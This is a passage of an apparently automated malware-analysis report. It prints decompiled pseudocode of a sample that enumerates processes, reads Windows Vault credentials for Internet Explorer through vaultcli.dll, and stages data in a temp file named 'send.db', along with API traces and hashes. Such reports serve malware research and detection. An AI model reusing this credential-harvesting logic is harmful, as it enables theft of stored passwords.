				if(_t18 == 0xffffffff) {
					L6:
					 *_t19 =  *_t19 & 0x00000000;
				} else {
					_t8 =  &_v560;
					Process32FirstW(_t18, _t8);
					while(_t8 != 0) {
						if(_v552 == _t14) {
							CloseHandle(_t18);
							E004036F7(_t19,  &_v524);
						} else {
							_t8 = Process32NextW(_t18,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t18);
					goto L6;
				}
				L7:
				return _t19;
			}










                                  0x0041222f
                                  0x00412231
                                  0x0041223b
                                  0x00412243
                                  0x00412248
                                  0x0041227b
                                  0x0041227b
                                  0x0041224a
                                  0x0041224a
                                  0x00412252
                                  0x00412270
                                  0x00412260
                                  0x00412286
                                  0x00412295
                                  0x00412262
                                  0x0041226a
                                  0x00000000
                                  0x0041226a
                                  0x00000000
                                  0x00412260
                                  0x00412275
                                  0x00000000
                                  0x00412275
                                  0x0041227f
                                  0x00412284

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                  • CloseHandle.KERNEL32(00000000), ref: 00412275
                                  • CloseHandle.KERNEL32(00000000), ref: 00412286
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 1789362936-0
                                  • Opcode ID: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                  • Instruction ID: debd20abf717d3e205526d08b8a6d3eb8db8cce60d0d25a78bdd72c07f1bd50f
                                  • Opcode Fuzzy Hash: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                  • Instruction Fuzzy Hash: BE01D6312042147BCB205BA4AC4DBFE77BCAB48761F1080AAF505D2290D7B889828A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B10E, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B10E(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                  0x0040b117
                                  0x0040b11f
                                  0x0040b129
                                  0x0040b12f
                                  0x0040b137
                                  0x0040b13d
                                  0x0040b145
                                  0x0040b14b
                                  0x0040b153
                                  0x0040b159
                                  0x0040b15b
                                  0x0040b164

                                  APIs
                                  • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD8C, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AD8C(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                  0x0040ad95
                                  0x0040ad9d
                                  0x0040ada7
                                  0x0040adad
                                  0x0040adb5
                                  0x0040adbb
                                  0x0040adc3
                                  0x0040adc9
                                  0x0040add1
                                  0x0040add7
                                  0x0040add9
                                  0x0040ade2

                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A968, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0040A968(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0040ACBE(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x41c150);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0040AC8B(_t240);
									_push(0x10);
									_push(0x41c140);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00401000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E004036F7( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E0040335A( &_v32, E004036F7( &_v64, L"Internet Explorer"));
											E00405FEB(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x41a910]");
												asm("movups [ebp-0x60], xmm0");
												E00403549( &_v100, E004036F7( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E00405FEB(_v68);
												_v68 = _t234;
												E00403549( &_v96, E004036F7( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E00405FEB(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E00403549( &_v84, E004036F7( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E00405FEB(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401FF2(_t235,  &_v100);
												E00402028(_t186);
												E00401441( &_v100);
											}
											E00405FEB(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00401000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E004036F7( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E0040335A( &_v24, E004036F7( &_v48, L"Internet Explorer"));
											E00405FEB(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x41a910]");
												asm("movups [ebp-0x60], xmm0");
												E00403549( &_v100, E004036F7( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E00405FEB(_v52);
												_v52 = _t234;
												E00403549( &_v96, E004036F7( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E00405FEB(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E00403549( &_v92, E004036F7( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E00405FEB(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401FF2(_t235,  &_v100);
												E00402028(_t186);
												E00401441( &_v100);
											}
											E00405FEB(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E00405FEB(_t234);
				E00405FEB(0);
				return E00405FEB(0);
			}







































                                  0x0040a970
                                  0x0040a972
                                  0x0040a975
                                  0x0040a977
                                  0x0040a97a
                                  0x0040a97d
                                  0x0040a980
                                  0x0040a983
                                  0x0040a986
                                  0x0040a990
                                  0x0040a999
                                  0x0040a99a
                                  0x0040a99b
                                  0x0040a9a8
                                  0x0040a9b1
                                  0x0040a9b5
                                  0x0040a9b6
                                  0x0040a9bb
                                  0x0040a9c6
                                  0x0040a9cf
                                  0x0040a9d1
                                  0x0040a9d7
                                  0x0040a9da
                                  0x0040a9dd
                                  0x0040a9e0
                                  0x0040a9e0
                                  0x0040a9e5
                                  0x0040a9e7
                                  0x0040a9ee
                                  0x0040ab12
                                  0x0040ab13
                                  0x0040ab16
                                  0x0040ab1b
                                  0x0040ab1e
                                  0x0040ab20
                                  0x0040ab2f
                                  0x0040ab45
                                  0x0040ab4f
                                  0x0040ab54
                                  0x0040ab57
                                  0x0040ab59
                                  0x0040ab65
                                  0x0040ab6c
                                  0x0040ab80
                                  0x0040ab88
                                  0x0040ab96
                                  0x0040aba3
                                  0x0040abab
                                  0x0040abb3
                                  0x0040abb7
                                  0x0040abc0
                                  0x0040abca
                                  0x0040abd0
                                  0x0040abd2
                                  0x0040abdd
                                  0x0040abe3
                                  0x0040abf0
                                  0x0040abf8
                                  0x0040abfd
                                  0x0040abfd
                                  0x0040ac00
                                  0x0040ac09
                                  0x0040ac10
                                  0x0040ac18
                                  0x0040ac18
                                  0x0040ac20
                                  0x0040ac25
                                  0x00000000
                                  0x0040ac25
                                  0x0040a9f4
                                  0x0040a9f7
                                  0x0040a9fa
                                  0x0040a9fb
                                  0x0040a9fe
                                  0x0040aa03
                                  0x0040aa08
                                  0x0040aa14
                                  0x0040aa2a
                                  0x0040aa34
                                  0x0040aa39
                                  0x0040aa3e
                                  0x0040aa44
                                  0x0040aa4a
                                  0x0040aa51
                                  0x0040aa65
                                  0x0040aa6d
                                  0x0040aa7b
                                  0x0040aa88
                                  0x0040aa90
                                  0x0040aa98
                                  0x0040aa9b
                                  0x0040aa9c
                                  0x0040aa9d
                                  0x0040aa9e
                                  0x0040aa9f
                                  0x0040aaa2
                                  0x0040aaa5
                                  0x0040aaa8
                                  0x0040aaa9
                                  0x0040aab4
                                  0x0040aabc
                                  0x0040aacf
                                  0x0040aad7
                                  0x0040aadc
                                  0x0040aadc
                                  0x0040aadf
                                  0x0040aae8
                                  0x0040aaef
                                  0x0040aaf7
                                  0x0040aaf7
                                  0x0040aaff
                                  0x0040ab04
                                  0x0040ac28
                                  0x0040ac28
                                  0x0040ac28
                                  0x0040aa08
                                  0x0040ac2e
                                  0x0040ac32
                                  0x0040ac33
                                  0x0040ac37
                                  0x0040ac3a
                                  0x0040ac43
                                  0x0040ac43
                                  0x0040a9d1
                                  0x0040a9c6
                                  0x0040a9a8
                                  0x0040ac4a
                                  0x0040ac4f
                                  0x0040ac4f
                                  0x0040ac59
                                  0x0040ac5f
                                  0x0040ac5f
                                  0x0040ac6b
                                  0x0040ac73
                                  0x0040ac7a
                                  0x0040ac8a

                                  APIs
                                    • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                  • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                  • String ID: 4$8$Internet Explorer
                                  • API String ID: 708496175-747916358
                                  • Opcode ID: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                  • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                  • Opcode Fuzzy Hash: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                  • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410F61, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410F61() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}
















                                  0x00410f6f
                                  0x00410f79
                                  0x00410f81
                                  0x00410fa0
                                  0x00410fa2
                                  0x00410fa9
                                  0x00000000
                                  0x00410faf
                                  0x00410faf
                                  0x00410fb4
                                  0x00411073
                                  0x00411084
                                  0x004110b4
                                  0x00411101
                                  0x00000000
                                  0x0041110c
                                  0x00411116
                                  0x00411116
                                  0x004110b6
                                  0x004110b6
                                  0x004110be
                                  0x004110ce
                                  0x004110dd
                                  0x004110ed
                                  0x00000000
                                  0x004110ef
                                  0x004110f9
                                  0x004110f9
                                  0x004110df
                                  0x004110e9
                                  0x004110e9
                                  0x004110d0
                                  0x004110da
                                  0x004110da
                                  0x004110c0
                                  0x004110ca
                                  0x004110ca
                                  0x004110be
                                  0x00411086
                                  0x0041108d
                                  0x004110a0
                                  0x00000000
                                  0x004110a2
                                  0x004110ac
                                  0x004110ac
                                  0x0041108f
                                  0x00411099
                                  0x00411099
                                  0x0041108d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410fba
                                  0x00410fc1
                                  0x00411002
                                  0x00411053
                                  0x00000000
                                  0x00411066
                                  0x00411070
                                  0x00411070
                                  0x00411004
                                  0x00411004
                                  0x0041100c
                                  0x0041101c
                                  0x0041102b
                                  0x0041103b
                                  0x00000000
                                  0x00411041
                                  0x0041104b
                                  0x0041104b
                                  0x0041102d
                                  0x00411037
                                  0x00411037
                                  0x0041101e
                                  0x00411028
                                  0x00411028
                                  0x0041100e
                                  0x00411018
                                  0x00411018
                                  0x0041100c
                                  0x00410fc3
                                  0x00410fc3
                                  0x00410fcb
                                  0x00410fdb
                                  0x00410fea
                                  0x00000000
                                  0x00410ff0
                                  0x00410ffa
                                  0x00410ffa
                                  0x00410fdd
                                  0x00410fe7
                                  0x00410fe7
                                  0x00410fcd
                                  0x00410fd7
                                  0x00410fd7
                                  0x00410fcb
                                  0x00410fc1
                                  0x00410fb4
                                  0x00410f83
                                  0x00410f89
                                  0x00410f91
                                  0x00411117
                                  0x0041111a
                                  0x00410f97
                                  0x00410f9e
                                  0x00000000
                                  0x00410f9e
                                  0x00410f91

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction ID: 559b4bd9e640983aade5312b2b5afba222edb0c69bc3aa9439dd4f75701b01ff
                                  • Opcode Fuzzy Hash: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction Fuzzy Hash: 16413830E0016CAADF248B55DC473FEB6B49B1A74DF0004E6E745E1691E27CCEC5CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004152FD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E004152FD(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t42;
				void* _t47;

				_t42 = __edx;
				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
				_t47 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t48 = _t47 + 4;
				E00403549(_t47 + 4, E004036F7( &_v8,  &_v2080));
				E00405FEB(_v8);
				_t12 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t42, _t48),  *_t12, _a4);
				E00403777( &_v32);
				return _a4;
			}









                                  0x004152fd
                                  0x004152ff
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                  • Instruction ID: d0947e770b90053afdf585e4db67557909fa3e1f37a5b6bb773202aecca51e71
                                  • Opcode Fuzzy Hash: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                  • Instruction Fuzzy Hash: 59115E71D40119ABCB10EBA1DC46FEE7BBCAF50349F00807AB405B6191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415307, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00415307(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00401052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E00403549(_t37 + 4, E004036F7( &_v8,  &_v2080));
				E00405FEB(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t35, _t38),  *_t8, _a4);
				E00403777( &_v32);
				return _a4;
			}









                                  0x00415307
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                  • Instruction ID: b9129dd2177f5d91cb3c2605560a9b03bc3764b0432bab46560860ad6b854e10
                                  • Opcode Fuzzy Hash: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                  • Instruction Fuzzy Hash: E1013C71D40119ABCB10EB61DC46FEE7BBCAF54309F00807AB505B2191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041579A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0041579A(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t41;
				void* _t42;
				void* _t45;

				_t41 = __edx;
				 *((intOrPtr*)(__ebx - 0x74aa3c3f)) =  *((intOrPtr*)(__ebx - 0x74aa3c3f)) + __ecx + 1;
				_v8 = 0;
				E00401052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552, _t42, _t45);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E0040357C( &_v8, _t41, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0040378B(E00403873( &_v32, _t41,  &_v8), 0, _a4);
				E00403777( &_v32);
				E00405FEB(_v8);
				return _a4;
			}










                                  0x0041579a
                                  0x0041579d
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
